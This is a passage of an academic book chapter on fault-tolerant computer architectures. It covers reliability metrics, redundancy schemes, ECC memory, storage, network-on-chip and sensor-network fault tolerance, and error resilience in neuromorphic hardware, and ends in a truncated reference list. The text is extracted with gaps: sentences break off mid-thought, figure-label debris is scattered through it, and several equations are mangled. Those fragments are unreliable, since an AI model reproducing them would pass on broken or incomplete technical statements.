life of the system, the chances of such failures manifesting as incorrect com-
putations have also increased. Hence, in applications that require high levels of
computational accuracy such as financial transactions in point-of-sales systems
or ATMs, scientific applications, the corresponding QoS can be expressed in
terms of functional reliability. It concerns the correctness of the results computed
by a system operating in a fault-inducing environment. The functional reliability
can be quantified by the probability of no physical fault-induced errors occurring
during application execution or the Mean Time between Failures (MTBF).
• Timing Reliability: The performance of the system in terms of the expected
behavior concerning the timeliness of execution completion can be expressed as
its timing reliability. It is used only in terms of real-time systems and depending
upon the criticality of the application, can be expressed in terms of Worst-
Case Executing Time (WCET), MTBF, Probability of Completion and Average
Makespan. WCET is usually used in hard real-time systems such as pacemakers
and automobile safety features where any instance of missing a deadline can have
fatal consequences. MTBF, frequently used in the context of repairable systems,
9 Fault Tolerant Architectures 287
can also be used for expressing the timing reliability in firm real-time systems
such as manufacturing assembly lines, where infrequent failures can be tolerated,
provided sufficient availability is ensured. Average makespan and probability of
completion are usually used in soft real-time systems such as streaming devices
and gaming consoles where frequent deadline misses can be tolerated as long as
they do not affect user experience.
• Lifetime Reliability: The expected operational life of the system can be char-
acterized by its lifetime reliability. Depending upon whether the system is
repairable and the cost of such repairs, metrics such as Mean Time To Detection
(MTTD), Mean Time To Failure (MTTF), Mean Time To Crash (MTTC),
and Availability can be used to characterize the system’s lifetime reliability.
MTTF refers to the expected time to the first observed failure in the system.
In healthcare applications and consumer electronics, the need for predictable
and extended MTTF can be the primary objective. Similarly, MTTC refers to
the expected operational time for the point at which the system does not have
sufficient resources for ensuring the expected behavior and is usually applicable
for repairable systems. In applications with long mission times such as space
exploration, repairing the failure mechanism is used to extend the MTTC.
However, repair time plays a critical role in high-availability applications such
as automated control of power generation.
Reliability Estimation
Estimating the implicit fault-masking and the impact of additional fault mitigation
measures forms an integral component of designing fault-tolerant system. While
underestimation of the impact of faults can lead to unreliable system behavior,
overly pessimistic estimations can result in overdesigning, eventually leading to
infeasible designs in resource-constrained systems. Some of the more widely used
reliability estimations are described below. A more detailed overview of reliability
estimation can be found in Wang and Chattopadhyay (2017).
288 S. S. Sahoo et al.
Fault Tolerance
computation with additional processing in order to detect and/or mask the effect of
errors during computation. Next we take a brief look at some generic fault tolerance
activities and the types of redundancies used to implement them.
The different activities involved in fault tolerance are shown in Fig. 8. Depending
upon the repairability of the system, implementing fault tolerance may involve a
subset of the following:
• Fault avoidance: This usually involves building the system with robust com-
ponents that are less susceptible to faults. It may also include avoiding system
configurations that increase the susceptibility to fault mechanisms. For instance,
given the impact of Dynamic Voltage Scaling (DVS) on SER, the designer
may choose to avoid configurations with lower supply voltages in high-radiation
environments.
• Detection: This is primarily to ascertain whether the computation has been
affected by any kind of faults. Depending upon the implementation, it may incur
timing and/or resource overheads.
• Diagnosis: Unlike detection, diagnosis concerns determining the fault character-
istics. This includes finding the type of fault – transient or permanent, locating the
component(s) causing the fault, estimating the impact of the fault on application
behavior, etc.
• Isolation: This process forms an integral component of repairable systems and
includes eliminating the faulty components from the computation until repair is
completed. In case of permanent faults, this may include finding the components
(or sub-components) that need to be excluded from any future computation.
• Repair: In repairable systems, fault tolerance may include allowing the affected
components to recover partially/completely to their operational states. For
instance, it may include reducing the workload on faster aging components to
reduce thermal stress.
• Recovery: While repair usually concerns the components of the system, recovery
primarily concerns the application execution. It can range from the mitigation of
any detected faults/errors to resetting the system from a hang state.
Redundancy
61
functional reliability but may adversely affect the lifetime reliability owing to
the parallel execution and resulting higher thermal stress. Spatial redundancy for
improving the lifetime reliability usually involves using cold spares.
• Temporal Redundancy involves additional re-execution of the computation work-
load on the same hardware module. As shown in Fig. 12a, it may include
complete re-execution when an error is detected at the end of the computation.
Similarly, with parallel error detection, the re-execution may occur from different
points, depending on the error occurrence, as shown in Fig. 12b. Figure 12c
shows the more widely used method of check-pointing with roll back recovery. In
the context of the matrix multiplication, it may involve creating checkpoints after
the computation of each row of the output matrix, such that any re-execution can
begin by restoring the stored checkpoint. The functional reliability of such meth-
ods is usually determined by the accuracy of the detection methods. As shown
in Fig. 13, the timing reliability of temporal redundancy-based methods requires
more complex estimation approaches as the execution time is nondeterministic in
such cases. Since temporal redundancy usually results in increased computation
per unit workload, it eventually leads to a lower operational lifetime.
• Information Redundancy involves computation of additional data points in order
to detect and/or recover any errors in computation. For instance, as shown
in Fig. 13, the input matrices are augmented with their column and row check-
sums resulting in larger operands Acc and Brc , respectively. Correspondingly, the
output matrix is a full checksum version of the original output matrix: Cf c . As
a result, it requires (N + 1)2 operations instead of N 2 and, therefore, adversely
affects both the timing and lifetime reliability.
Æ Æ
Æ Æ
Fault-Tolerant Computation
The fault mechanisms described in section “Faults, Errors, and Failures” can result
in errors in computation and reduced system lifetime. We describe the methods
for improving fault tolerance in computation under three categories. Single-core
computing includes all methods that can improve reliability of a single Processing
Element (PE). The methods that take advantage of the presence of multiple PEs
on the architecture are described under multicore computing. The reconfigurable
computing subsection describes specialized methods applicable to reconfigurable
architectures – FPGA and Coarse-Grained Reconfigurable Arrays (CGRA).
Single-Core Computing
Tolerance techniques for soft errors in computation circuits primarily involve some
form of execution redundancy – either spatial or temporal. Implementing DMR
provides only fault/error detection, and TMR provides masking of any single
fault/error. In terms of cost, TMR can result in more than 200% area and power
9 Fault Tolerant Architectures 295
overheads. Area and power overheads in a LEON3 core when introduced with
varying levels of TMR in pipeline, cache, and register file are reported in Kriebel
et al. (2014). Corresponding results for an FPGA-based implementation of LEON3
are presented in Wirthlin et al. (2016). In both cases, power and area overheads of
more than 200% are observed. Circuit-level fault masking usually involves circuit
hardening by using multiple flip-flops or by gate resizing. Multiple flip-flop-based
designs use scan-flops already present in the circuit to provide error tolerance.
Gate resizing involves using bigger transistors to provide better tolerance against
radiation-induced soft errors. More flexible methods, presented in Mohanram and
Touba (2003) and Rao et al. (2006), use partial replication based on profiling results
to obtain reduced coverage at lower power and area overheads. Similarly, low
overhead methods based on circuit monitoring enable low cost and configurable
fault detection.
At the architecture level, the granularity of execution replication provides the
trade-off in error resilience and associated overheads. The granularity may vary
from a single module like the pipeline (Austin 1999; Slegel et al. 1999) to an
entire core in chip multiprocessors (Mukherjee et al. 2002). Time redundancy-
based techniques like redundant multi-threading are also used. Some fault detection
methods involve manipulating the pipeline (Blaauw et al. 2008) to detect both
transient and intermittent faults. Similar to circuit level, symptom or assertion
monitoring-based detection methods provide incomplete coverage at very low
overheads. The symptoms include exceptions, control flow mis-speculations and
cache or translation look-aside buffer misses.
In addition to the uniform protection schemes discussed above, opportunistic pro-
tection schemes aim at using underutilized resources to insert redundant execution
for critical portions of the computation. Wang et al. (2013) present two protection
schemes: an aggressive scheme that achieves redundant execution for all protected
instructions while incurring high overheads and an opportunistic protection scheme
that replicates protected instructions only if there are NOP instructions around it,
thereby incurring zero penalty:
A × N1 ± A × N2 = A × (N1 ± N2 )
(1)
(N1 ⊗ N2 ) mod A = ((N1 mod A) ⊗ (N2 mod A)) mod A
Some code-based methods are also used at architecture level to provide concur-
rent fault detection and masking at lower area overheads. These methods are based
on AN codes (Rao 1974) and are based on the principle of providing a redundant
representation of numbers such that the results of some operation on them can be
analyzed to detect and correct errors. As shown in Equation(1), some operations
preserve certain properties of the operands. Such operations are performed on
both operands as well as the result, and the results can be used for detection and
sometimes correction. However, such methods are very application-specific and
require high design effort.
296 S. S. Sahoo et al.
Multicore Computing
• Core level: This involves parallel execution on two separate cores and com-
parison of the results to detect/mask any faults/errors. The coupling between
the cores can range from tight lockstepping (Shubu 2008), which requires
synchronized execution on similar cores, to loosely synchronized execution
across heterogeneous cores. Such methods require additional hardware structures
to ensure the synchronizations and enforce hardware-level determinism.
• Simultaneous and Redundant Threading (SRT): SRT-based methods leverage the
Simultaneous Multi-threading (SMT) of the cores to implement asynchronous
execution of redundant threads and remove the resource conflict of more tight
lockstepping methods. Architectural features such as load-value-queue, store
buffer, slack-fetch of caches, and branch outcome queues are used to improve
the performance of such methods (Sorin 2009).
• Redundant multi-threading: Software-based Redundant Multi-threading (SRMT)
approaches involve compiler-based methods that use leading and trailing threads,
created by the compiler, to provide redundant execution. It usually involves
compiler transformations such as function and input replication. Although
primarily a software-based method, architectural enhancements such as hardware
message queues can be used to improve the performance.
• Process-level: Such techniques involve replication of the whole process.
Although a purely software-based multicore systems enable parallel execution
of the processes and reduce the timing overheads.
Reconfigurable Computing
Partially Dynamically
Reconigurable PLD
Fault-Tolerant Memory/Storage
Information redundancy in the form of additional bits for ECC is commonly used
for both Static Random Access Memory (SRAM)-based caches and Dynamic
Random Access Memory (DRAM)-based main memory. Hamming or Hsiao code-
based Single-bit-Error-Correcting (SEC) and Double-bit-Error-Detecting (DED)
codes are usually sufficient for most systems (Hamming 1950; Hsiao 1970). More
robust methods such as Double-bit-Error-Correcting (DEC) and Triple-bit-Error-
Detecting (TED) codes can be used for higher resilience against random bit errors.
Reed and Solomon (1960) codes and Single-Nibble-error-Correcting (SNC) and
Double-Nibble-error-Detecting (DND) codes are usually used for protection against
multiple-bit burst errors. Granularity of ECC implementation provides the trade-
off between resilience and storage overhead. Table 1 shows the storage overheads
associated with some ECC implementations.
9 Fault Tolerant Architectures 299
Cache/On-chip SRAM
In caches, the write-policy determines the amount of correction capabilities that can
be implemented. For a write-through policy, the access granularity at Last Level
Cache (LLC) from Level 1 (L1) cache is a word, and hence the ECC granularity
at LLC should be a single word. However, for a write-back policy of L1 cache, the
LLC access is a full L1 cache line and, therefore, allows higher granularity of ECC
with reduced overheads. Additional tolerance can be provided by interleaving more
ECC codes within the cache line, albeit with more overheads.
Main Memory/DRAM
Most systems use commodity DRAM devices for main memory in Dual in-line-
Memory Module (DIMM) or Small Outline DIMM (SODIMM) form factors.
ECC DIMMs provide SEC-DED for each DRAM rank and have higher overheads
compared to non-ECC DIMMs. More recent methods have been developed to
provide fault tolerance against permanent faults in one or more chips on a DIMM.
Such Chipkill-correct techniques spread the DRAM access over multiple chips and
use single-symbol error-correcting and double-symbol error-detecting codes for
error correction. Adaptive methods of ECC like Virtualized ECC (Yoon and Erez
2010) and Bamboo codes (Kim et al. 2015) provide flexible and tunable approaches
to main memory fault tolerance. Such techniques can be used to find appropriate
trade-offs in cross-layer design approaches. Virtualized ECC uses a scheme where
the redundancy information for error detection and correction are stored separately
and the correcting information is accessed only in case of a detected error. This
reduces the overall power consumption and enables effective error correction and
Chipkill-correction for both ECC and non-ECC DIMMs with low overheads.
Storage
With the emergence of data-centric applications such as data analytics and AI/ML,
highly reliable storage systems have become indispensable. Unlike the main
memory and cache/on-chip SRAM, the reliability requirements in storage systems
300 S. S. Sahoo et al.
are expressed from the perspective of data durability and availability. The faults
found in local storage mediums can be categorized into three types. Whole disk
failures corresponds to situations when a complete storage unit becomes unusable.
Latent Section Errors (LSEs) corresponds to the unreachability of select sectors
of the storage medium for read/write requests of the application. Undetected Disk
Errors (UDEs) can not be repaired by the disk and are only detectable when a read
is issued for the affected sector. Correspondingly, the metrics Mean Time to Data
Loss (MTTDL) and availability are usually used for quantifying the fault tolerance
of storage systems.
Depending upon the type of device used for storage, Hard Disk Drive (HDD)
or Solid-state Drive (SSD), specialized fault tolerance measures may be imple-
mented (Kim et al. 2019). However, redundant storage is primarily used for
improving fault tolerance, and the implementation can be one of the following
methods:
• N-fold data replication: The data is replicated across N-storage targets, and data
loss occurs only if the data is corrupted on all storage targets. Evidently, in spite
of being highly reliable, this method incurs very high costs.
• K-out-of-N erasure coding: This usually involves implementing some form of
information redundancy to transform data of K symbols into N (> K) symbols.
The transformation ensures recovery of the data from a subset of the N symbols.
• Redundant Array of Inexpensive Disks (RAID): First proposed by Patterson et al.
(1988), this involves using multiple physical disk drive components into one or
more logical units for improving reliability and/or performance. Depending on
the RAID level, one of several schemes may be implemented to satisfy varying
QoS requirements: fault tolerance, availability, performance, and capacity. The
reliability estimation models for the schemes can be found in Chen et al. (1994).
Storage overhead and power are the cost factors associated with design of a
resilient memory system. Flexible error protection methods can enable adaptation
to system-level requirements, both at design time and run-time. Summarizing,
ECC granularity and fault-coverage provide the tunable parameters and memory
controller, the tuning knob for varying error protection levels based on system
requirements.
Error detection methods in NoCs include delay sampling for transient faults, and
BIST and inline testing for permanent faults. Similarly, the ACK and NACK signals
are used in the transport layer to detect errors in transmission. Temporal redundancy-
based transient fault mitigation methods for communication include multi-sampling
and hop-to-hop retransmission. Similarly, techniques for permanent and intermittent
fault mitigation include split-link transmission schemes, where a partially faulty
link is used for transmission along with other partially or fully functional links.
Similarly, a methodology for improving the lifetime of the communication links is
proposed by Das et al. (2013). The proposed method involves joint optimization of
the system lifetime of NoC and the processors. Information redundancy-based fault
mitigation methods are similar to those used for fault-tolerant memory. However,
extra protection is used for the more critical header information of a packet.
Forward error correction with block codes and convolutional codes are used for
improving the reliability of end-to-end communication. Similarly, probabilistic
routing techniques like flooding, gossip flooding, and directed flooding use packet
replication and routing across multiple paths to increase the probability of correct
transmission. Further, spatial redundancy for communication usually involved using
additional and spare wires for transmission (Kakoee et al. 2011).
In addition to the computation, communication, and storage-related fault toler-
ance methods described above, multiple works have explored the fault tolerance
in uncore components. Specifically, the Level 2 Cache controllers, the DRAM
controllers, crossbar interconnects, and PCI Express I/O controller are studied
in Cho et al. (2017) for their impact on application failures due to faults. In
addition, Cho et al. (2017) propose replay recovery techniques to reduce the effect
of soft errors in uncore components by more than 50× with minimal impact of
chip-level area and power overheads.
Cross-Layer Reliability
Information redundancy
Implicit Masking
CLR-integrated ASW Implementation
Implicit Masking
CLR-integrated HW
W Implementation
Implementation
Implicit Masking
Fig. 17 Redundancy methods across layers. Cross-layer Reliability (CLR) implementation across
hardware (HW), System Software (SSW), and Application Software (ASW) (Sahoo 2019)
9 Fault Tolerant Architectures 303
Pseudocode Complexity ? ? ?
Abstraction Interfaces
System stack
Logic
CPD AVF ? ?
Behavior
VI char SER ? ?
VI char
(switch)
Signal Processing
Signal processing applications usually involve the acquisition and computations on
real world information which has some level of built-in noise. Further, the output
from such applications, image processing in particular, are usually used for human
perception, which has its own limitations. Therefore, multiple works have leveraged
computing paradigms such as approximate computing and precision scaling to
provide low overhead fault tolerance. Shim et al. (2004) presented a method of using
a reduced precision replica, whose output could be used as the corrected output in
case of errors in the original system. Shim and Shanbhag (2006) introduced soft
error-tolerant Digital Signal Processing (DSP) by using low complexity estimators
of the main DSP block, thereby reducing the overheads of redundancy methods
considerably. Biasielli et al. (2022) use the concept of usefulness instead of
correctness of output images to design efficient Convolutional Neural Networks
(CNN)-based fault detection. The authors use the CNN-based fault detection along
with approximate computing based replicated execution to provide low overhead
fault tolerance in a camera image acquisition system. Similarly, Schmidt and French
(2013) proposed a combination of HW/SW fault tolerance by using Radiation
304 S. S. Sahoo et al.
Wireless Communication
Wireless Sensor Networks (WSNs) have emerged as a promising candidate solution
for providing ambient intelligence. WSNs include Sensor Nodes (SNs) that monitor
the physical environment to provide the observations for various cyberphysical sys-
tems. Consequently, the SNs are usually deployed in harsh environments that may
result in reliability issues with an SN’s sensing, computation, and communication
functions. Overall, faults in an WSN may arise from node-, sink-, network-
level (Effah and Thiare 2018). The corresponding fault tolerance approaches
include centralized, decentralized, and hybrid approaches with varying trade-offs
in reliability and communication costs (Adday et al. 2022). Using traditional
redundancy-based methods for computation, on SNs, gateways, and base-station,
and retransmission using additional links for communication would incur large
costs. A cross-layer approach to fault management in WSNs is presented by Vihman
et al. (2020). The presented approach aims to eliminate any form of hardware and
temporal redundancy and, instead, uses the data gathered by the various levels –
SNs at the Edge, gateways at the Fog and the Cloud – to detect and isolate the faults.
Since the SNs are usually resource-constrained systems that aim to minimize energy
consumption, such cross-layer reliability approaches can be used to ensure high
availability with minimal resource overheads resulting from duplicated execution.
The last two decades have witnessed exponential growth in the application areas
using electronic systems. Much of this growth has been fuelled by emerging
technologies – both in terms of new devices beyond Complementary Metal-Oxide
Semiconductor (CMOS) and novel computing paradigms such as AI/ML, IoTs, etc.
In this section, we provide an overview of reliability issues and fault tolerance across
some emerging technologies.
DRAM has long been the choice substrate for architecting main memory subsystems
due to its low cost per bit. However, DRAM is a fundamental performance
and energy bottleneck in almost all computer systems (Wulf and McKee 1995)
and is experiencing significant technology scaling challenges. DRAM-compatible
emerging nonvolatile memory (NVM) technologies such as Flash, oxide-based
Resistive RAM (OxRRAM), phase-change memory (PCM), and spin transfer torque
or spin orbit torque magnetic RAM (STT/SOT-MRAM) can address some of
9 Fault Tolerant Architectures 305
these challenges (Mutlu 2013). Apart from their use as DRAM alternatives in
conventional computing, NVMs are now used in neuromorphic computing (Mead
1990), which are analog computing systems (hardware) that mimic the brain’s archi-
tecture. Recent demonstrations include the use of OxRRAM (Mallik et al. 2017),
PCM (Nandakumar et al. 2018), Ferroelectric RAM (FeRAM) (Mulaosmanovic
et al. 2017), and STT-/SoT-MRAM (Vincent et al. 2015).
We discuss the reliability implication for NVM-based neuromorphic hardware.
To this end, Fig. 19A and B show a simple feedforward and a recurrent neural
network architecture, respectively. The synaptic weights between the neurons are
implemented using NVMs. In Fig. 19C we illustrate the architecture of a crossbar,
which is the building block of a neuromorphic hardware. A crossbar is a 2D
organization of horizontal wordlines and vertical bitlines. An NVM is integrated at
the intersection of a bitline and a wordline. Finally, in Fig. 20, we illustrate a many-
core design where the crossbar arrays are interconnected using a time-multiplexed
interconnect (Balaji et al. 2019).
For neuromorphic hardware, reliability issues may lead to logic or memory
failures. A logic failure is related to the peripheral logic of a crossbar consisting of
neuron circuitries. A memory failure is related to the NVM devices implementing
synaptic weights. We now elaborate these issues.
Interconnect
Fig. 21 Operation of an
OxRRAM cell. The left
subfigure shows the LRS
state. The right subfigure
shows the HRS state
Fig. 22 Read disturbances due to structural alteration in an OxRRAM cell. The left subfigure
shows a reduction of the conductive filament gap (i.e., read disturbance of HRS state) on the
application of a stress voltage. The right subfigure shows the lateral growth of the conductive
filament (i.e., read disturbance of LRS state) due to application of a stress voltage
308 S. S. Sahoo et al.
Fig. 23 (a) A phase-change memory (PCM) cell and (b) current needed to SET, RESET, and read
a PCM cell
9 Fault Tolerant Architectures 309
Fig. 24 Feedback-driven increase of the self-heating temperature of a PCM cell during amor-
phization
using the HD Module, while the PCM resistance is used to compute the Joule
heating in the GST Wj for the programming current Iprog using the JH Module.
The self-heating temperature TSH is computed inside the SH Module using the
Joule heating and the heat dissipation. Finally, the self-heating temperature is used to
compute the crystallization fraction Vc using the CF Module. The iterative process
terminates when the GST is amorphized, i.e., Vc = 0.
The self-heating temperature of a PCM during amorphization can lead to several
thermal-related issues. First, it can lower the write endurance of the cell, where write
endurance is defined as the number of times a PCM cell can be reliably programmed.
In fact, Titirsha et al. (2021) have shown that endurance exponentially reduces with
an increase in temperature. Second, higher PCM temperatures can lead to the aging
of the CMOS circuitries around the NVM cell.
Neuromorphic systems (AI/ML hardware, in general) are now used in many safety-
critical applications such as monitoring vital physiological data in a healthcare
application and object detection in autonomous vehicles. A fault in such a system
may lead to catastrophic failure. The good news is that machine learning models are
over-parameterized, which means that not neuron and synaptic failure may lead to
output errors. In this section, we evaluate first evaluate the built-in error tolerance of
machine learning models. Thereafter, we show how the error tolerance of a model
can be improved by exploiting self-repair property of the brain.
ResNet MobileNet
50
0
20 40 60 80 100
Number of Evaluations
Fig. 25 Accuracy drop of ResNet and MobileNet with errors injected using the ARES frame-
work (Reagen et al. 2018)
100
Weights (%)
0
LeNet AlexNet VGGNet ResNet DenseNet MobileNet Xception AVERAGE
Fig. 26 Fraction of the trained weights that leads to no accuracy drop due to error injection
Figure 25 plots these results for ResNet and MobileNet, two example models. We
make two key observations.
First, not all errors lead to an accuracy drop. This means that deep learning mod-
els are to a certain extent resilient to errors. Second, between ResNet and MobileNet,
MobileNet has fewer synaptic weights that are error-resilient. Therefore, we see a
significant accuracy drop for most errors. For ResNet, we see an accuracy drop only
when an error affects a non-resilient synaptic weight. To further expand on this,
Fig. 26 reports the fraction of trained synaptic weights in the first and last (dense)
layers of seven models that leads to no accuracy drop when a single random error is
injected.
We observe that an average 37% of synaptic weights in the first layer and 30%
in the last layer are resilient to errors. Therefore, these synaptic weights do not need
fault tolerance. The cost of fault tolerance can be reduced by providing solutions for
only the neurons and synapses, which lead to accuracy drop when implemented on
a faulty device. For instance, Liu et al. (2017) propose a methodology to rescue bit
failures in NVM-based neuromorphic hardware in order to restore the computational
accuracy. The design methodology consists of three steps. First, authors propose to
identify weights of a machine learning model that have lower impact on accuracy.
Essentially, model weights are categorized into significant and insignificant weights.
Next, authors propose a retraining algorithm to compensate for single-bit failure
by retuning the trainable weights. Finally, during the mapping step, a redundancy
mapping scheme is used to further improve the computation accuracy.
the brain (Parpura et al. 1994). Self-repair is facilitated by restoring the spike firing
frequency of a failed neuron using a closed-loop retrograde feedback signal.
Figure 27 illustrates how an astrocyte regulates the neuronal activity at a synaptic
site using a closed-loop feedback mechanism.
Astrocyte causes a transient increase of intracellular calcium (Ca 2+ ) levels, which
serves as the catalyst for self-repair. Ca 2+ -induced Ca 2+ release (CICR) is the main
mechanism to regulate Ca 2+ in the healthy brain. CICR is triggered by inosital
1,4,5-triphosphate (I P3 ), which is produced upon astrocyte activation. To describe
the operation of the astrocyte, let δ(t − τ ) be a spike at time τ from the neuron
ni . This spike triggers the release of 2-arachidonyl glycerol (2-AG), a type of
endocannabinoid responsible for stimulating the cytosolic calcium Ca 2+ (cyt). The
quantity of 2-AG produced is governed by the ordinary differential equation (ODE)
dAG −AG
= + rAG · δ(t − τ ), (2)
dt τAG
where AG is the quantity of 2-AG, τAG is the rate of decay, and rAG is the rate of
production of 2-AG.
On one pathway, the cytosolic calcium is absorbed by the endoplasmic reticulum
(ER) via the sarcoendoplasmic reticulum Ca 2+ -ATPase (SERCA) pumps, and on the
other pathway, the cytosolic calcium enhances the phospholipase C (PLC) activation
process. This event increases I P3 production and ER intracellular calcium release
via the CICR mechanism.
The intracellular astrocytic calcium dynamics control the glutamate (Glu) release
from the astrocyte, which is governed by
dGlu −Glu
= + rGlu (t − tCa ), (3)
dt τGlu
where τGlu is the rate of decay, rGlu is the rate of production of glutamate, and tCa is
time at which Ca 2+ crosses the release threshold. The glutamate generates e-SP, the
indirect signal to the synaptic site. e-SP is related to Glu using the following ODE:
deSP −eSP meSP
= + Glu(t), (4)
dt τeSP τeSP
where τeSP is the decay rate of e-SP and meSP is a scaling factor.
312 S. S. Sahoo et al.
Finally, there exists a direct signaling pathway (DSE) from neuron ni to the
synaptic site. The DSE is given by
DSE = −KAG · AG(t), (5)
where KAG is a constant. Overall, the synaptic transmission probability (PR) at the
synaptic site is
DSE(t) + eSP (t)
P R(t) = P R(0) + P R(0) (6)
100
a b
Fig. 28 Inserting an astrocyte in a neural network. (a) Original network of neurons and synapses.
(b) Astrocyte-modulated neurons and synapses
9 Fault Tolerant Architectures 313
50
25
0
20 40 60 80 100
Time (sec)
Conclusion
The increasing prevalence of AI/ML-based systems and the quest for smart things
are expected to drive the growth and innovations in electronic systems for the
next few decades. As we move from isolated smart things toward collective
intelligence, electronic systems are being deployed across varying operating envi-
ronments. Consequently, the reliability requirements are going to vary across
not just application domains but also on each system’s operating environment.
Therefore, designing fault-tolerant architectures forms an indispensable component
of application-specific system design. While the fundamental approaches to fault
tolerance, such as redundancy and diversity, still apply, these approaches need to be
tailored at the system-level for emerging technologies. To this end, this chapter pro-
vides an overview of both the essential background and the emerging approaches to
designing fault-tolerant architectures. Additionally, the chapter also provides a brief
overview of state-of-the-art architecture-level methods for fault-tolerant processing.
The scope for related future research primarily includes the design of application-
specific fault tolerance. Novel approaches such as cross-layer reliability and infor-
mation processing factory (Rambo et al. 2019) provide a path for implementing
cost-efficient, dynamically adaptable fault tolerance. Further, the exploration into
leveraging the benefits of newer computing paradigms such as approximate com-
puting and memory-oriented computing for inherently robust applications can result
in fault tolerance with reduced overheads.
Glossary
References
Adday GH, Subramaniam SK, Zukarnain ZA, Samian N (2022) Fault tolerance structures in
wireless sensor networks (wsns): survey, classification, and future directions. Sensors 22(16).
https://doi.org/10.3390/s22166041, https://www.mdpi.com/1424-8220/22/16/6041
Austin TM (1999) Diva: a reliable substrate for deep submicron microarchitecture design.
In: MICRO-32. Proceedings of the 32nd Annual ACM/IEEE International Symposium on
Microarchitecture, pp 196–207. https://doi.org/10.1109/MICRO.1999.809458
Avizienis A, Laprie J, Randell B, Landwehr C (2004) Basic concepts and taxonomy of dependable
and secure computing. IEEE Trans Depend Secure Comput 1(1):11–33. https://doi.org/10.1109/
TDSC.2004.2
Arzt E, Kraft O, Sanchez JE, Bader S, Nix WD (1992) Electromigration resistance and mechanical
strength
Balaji A, Wu Y, Das A, Catthoor F, Schaafsma S (2019) Exploration of segmented bus as scalable
global interconnect for neuromorphic computing. In: GLSVLSI
Bar-El H, Choukri H, Naccache D, Tunstall M, Whelan C (2006) The sorcerer’s apprentice guide
to fault attacks. Proc IEEE 94(2):370–382. https://doi.org/10.1109/JPROC.2005.862424
Baraza J, Gracia J, Gil D, Gil P (2002) A prototype of a vhdl-based fault injec-
tion tool: description and application. J. Syst. Architect 47(10):847–867. https://doi.
org/https://doi.org/10.1016/S1383-7621(01)00036-4, https://www.sciencedirect.com/science/
article/pii/S1383762101000364
Biasielli M, Bolchini C, Cassano L, Mazzeo A, Miele A (2022) Approximation-based fault
tolerance in image processing applications. IEEE Trans Emerg Top Comput 10(2):648–661.
https://doi.org/10.1109/TETC.2021.3100623
Binder D, Smith EC, Holman AB (1975) Satellite anomalies from galactic cosmic rays. IEEE
Trans Nucl Sci 22(6):2675–2680. https://doi.org/10.1109/TNS.1975.4328188
Blaauw D, Kalaiselvan S, Lai K, Ma W, Pant S, Tokunaga C, Das S, Bull D (2008) Razor II: in situ
error detection and correction for PVT and SER tolerance. In: 2008 IEEE International Solid-
State Circuits Conference – Digest of Technical Papers, pp 400–622. https://doi.org/10.1109/
ISSCC.2008.4523226
Carter NP, Naeimi H, Gardner DS (2010) Design techniques for cross-layer resilience. In: 2010
Design, Automation Test in Europe Conference Exhibition (DATE 2010), pp 1023–1028.
https://doi.org/10.1109/DATE.2010.5456960
Chen PM, Lee EK, Gibson GA, Katz RH, Patterson DA (1994) Raid: high-performance, reliable
secondary storage. ACM Comput Surv 26(2):145–185. https://doi.org/10.1145/176979.176981
Cheng E, Mirkhani S, Szafaryn LG, Cher CY, Cho H, Skadron K, Stan MR, Lilja K, Abraham JA,
Bose P, Mitra S (2016) Clear: cross-layer exploration for architecting resilience – combining
hardware and software techniques to tolerate soft errors in processor cores. In: Proceedings of
the 53rd Annual Design Automation Conference, DAC’16. ACM, New York, pp 68:1–68:6.
https://doi.org/10.1145/2897937.2897996, http://doi.acm.org/10.1145/2897937.2897996
Cho H, Cheng E, Shepherd T, Cher CY, Mitra S (2017) System-level effects of soft errors in uncore
components. IEEE Trans Comput-Aided Design Integr Circuits Syst 36(9):1497–1510. https://
doi.org/10.1109/TCAD.2017.2651824
9 Fault Tolerant Architectures 317
Slegel TJ, Averill RM, Check MA, Giamei BC, Krumm BW, Krygowski CA, Li WH, Liptay JS,
MacDougall JD, McPherson TJ, Navarro JA, Schwarz EM, Shum K, Webb CF (1999) Ibm’s
S/390 G5 microprocessor design. IEEE Micro 19(2):12–23. https://doi.org/10.1109/40.755464
Sorin DJ (2009) Fault tolerant computer architecture. Syn Lectures Comput Architect 4(1):1–104
Srinivasan S, Krishnan R, Mangalagiri P, Xie Y, Narayanan V, Irwin MJ, Sarpatwari K (2008)
Toward increasing fpga lifetime. IEEE Trans Depend Secure Comput 5(2):115–127. https://doi.
org/10.1109/TDSC.2007.70235
Titirsha T, Song S, Das A, Krichmar J, Dutt N, Kandasamy N, Catthoor F (2022) Endurance-aware
mapping of spiking neural networks to neuromorphic hardware. TPDS 33(2):288–301. https://
doi.org/10.1109/TPDS.2021.3065591
Varshika ML, Corradi F, Das A (2022) Nonvolatile memories in spiking neural network
architectures: current and emerging trends. Electronics 11(10):1610. https://doi.org/10.3390/
electronics11101610
Vihman L, Kruusmaa M, Raik J (2020) Data-driven cross-layer fault management architecture
for sensor networks. In: 2020 16th European Dependable Computing Conference (EDCC), pp
33–40. https://doi.org/10.1109/EDCC51268.2020.00015
Vincent AF, Larroque J, Locatelli N, Romdhane NB, Bichler O, Gamrat C, Zhao WS, Klein JO,
Galdin-Retailleau S, Querlioz D (2015) Spin-transfer torque magnetic memory as a stochastic
memristive synapse for neuromorphic systems. TBCAS 9(2):166–174. https://doi.org/10.1109/
TBCAS.2015.2414423
Wang Z, Chattopadhyay A (2017) High-level Estimation and Exploration of Reliability for
Multi-processor System-on-chip. Springer. https://link.springer.com/book/10.1007/978-981-
10-1073-6
Wang Z, Li R, Chattopadhyay A (2013) Opportunistic redundancy for improving reliability of
embedded processors. In: 2013 8th IEEE Design and Test Symposium, pp 1–6. https://doi.org/
10.1109/IDT.2013.6727090
Wang Z, Paul G, Chattopadhyay A (2014) Processor design with asymmetric reliability. In: 2014
